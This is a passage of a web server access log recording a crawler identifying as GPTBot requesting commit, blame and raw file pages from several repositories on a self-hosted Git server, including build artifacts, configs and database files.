"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:14:56:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 10928] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:14:56:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 10932] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:14:56:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 10934] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:14:56:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/honeywell-logo.svg?display=source" [Client 74.7.227.38] [Length 13878] [Gzip 2.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:14:56:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fcomponents%2fServices.tsx" [Client 74.7.227.38] [Length 26564] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx" -[17/Feb/2026:14:56:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fcomponents%2fContact.tsx" [Client 74.7.227.38] [Length 28721] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Contact.tsx" -[17/Feb/2026:14:56:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fcomponents%2fChatBot.tsx" [Client 74.7.227.38] [Length 27719] [Gzip 5.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/ChatBot.tsx" -[17/Feb/2026:14:56:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz" [Client 74.7.227.38] [Length 10892] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor" -[17/Feb/2026:14:56:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz" [Client 74.7.227.38] [Length 10861] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor" -[17/Feb/2026:14:56:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz" [Client 74.7.227.38] [Length 10860] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot" -[17/Feb/2026:14:56:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14349] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/my_database.db" -[17/Feb/2026:14:56:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14349] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/my_database.db" -[17/Feb/2026:14:56:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 13524] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:14:56:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.assets.json" [Client 74.7.227.38] [Length 9883] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.assets.json" -[17/Feb/2026:14:56:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa.diff" [Client 74.7.227.38] [Length 1157] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" -[17/Feb/2026:14:56:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:14:56:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode" [Client 74.7.227.38] [Length 10141] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project" -[17/Feb/2026:14:56:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/database.sqlite?display=rendered" [Client 74.7.227.38] [Length 10877] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/database.sqlite" -[17/Feb/2026:14:56:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz" [Client 74.7.227.38] [Length 4587481] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz" -[17/Feb/2026:14:56:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz" [Client 74.7.227.38] [Length 14152419] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz" -[17/Feb/2026:14:56:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/database.sqlite?display=rendered" [Client 74.7.227.38] [Length 10844] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/database.sqlite" -[17/Feb/2026:14:56:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fupdate_status.py" [Client 74.7.227.38] [Length 24925] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py" -[17/Feb/2026:14:56:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:56:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:56:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fproject.assets.json" [Client 74.7.227.38] [Length 20706] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.assets.json" -[17/Feb/2026:14:56:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10461] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:14:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode" -[17/Feb/2026:14:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10464] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:14:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10943] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs" -[17/Feb/2026:14:56:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=html%2fassets%2fimages%2fhoneywell-logo.svg" [Client 74.7.227.38] [Length 22248] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:14:56:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 20102] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:56:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 13791] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:56:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 20141] [Gzip 9.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:56:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 14940] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:56:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 20141] [Gzip 9.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:56:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 10951] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:56:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 20140] [Gzip 9.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:56:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 13824] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:56:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 10952] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:56:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9933] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:56:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73593] [Gzip 20.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:56:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 10177] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:14:56:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 10176] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:14:56:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 10208] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:14:56:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 10177] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:14:56:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 10207] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:14:56:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:14:56:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 10206] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:14:56:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 10207] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 